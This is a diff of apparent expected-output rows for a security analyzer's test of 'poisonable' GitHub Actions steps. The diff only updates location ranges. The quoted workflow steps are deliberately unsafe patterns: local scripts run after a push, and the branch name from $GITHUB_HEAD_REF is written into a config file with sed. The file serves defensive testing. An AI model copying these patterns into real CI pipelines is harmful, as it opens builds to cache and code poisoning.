.github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:40:74 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | | .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| 